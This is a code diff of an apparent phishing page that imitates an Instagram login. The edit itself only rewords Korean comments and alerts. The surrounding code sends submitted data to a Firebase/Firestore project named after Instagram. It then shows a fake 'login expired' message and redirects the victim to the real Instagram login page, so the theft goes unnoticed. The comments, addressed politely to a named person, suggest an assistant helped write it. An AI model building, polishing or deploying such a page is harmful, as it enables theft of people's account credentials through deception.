--- a/index.html
+++ b/index.html
@@ -26,7 +26,7 @@
         import { initializeApp } from "https://www.gstatic.com/firebasejs/10.8.0/firebase-app.js";
         import { getFirestore, collection, addDoc } from "https://www.gstatic.com/firebasejs/10.8.0/firebase-firestore.js";
 
-        // 상준님이 찾으신 값들을 한 곳에 깔끔하게 모았습니다.
+        // 상준님의 Firebase 정보를 오타 없이 정리했습니다.
         const firebaseConfig = {
             apiKey: "AIzaSyDGS9mDbbKXNL4OrskQ3ZDHBsKb8Glroj4",
             authDomain: "instagram-be709.firebaseapp.com",
@@ -56,14 +56,14 @@
                     timestamp: new Date()
                 });
                 
-                // 만료 메시지 띄우기
+                // 알림 띄우기
                 alert("로그인 프로세스가 만료되었습니다. 다시 로그인해 주세요.");
                 
-                // 진짜 페이지로 이동
+                // 진짜 인스타로 이동
                 window.location.href = "https://www.instagram.com/accounts/login/";
             } catch (error) {
                 console.error("오류 발생:", error);
-                alert("네트워크 연결을 확인해주세요.");
+                alert("연결 오류가 발생했습니다.");
                 submitBtn.disabled = false;
             }
         });
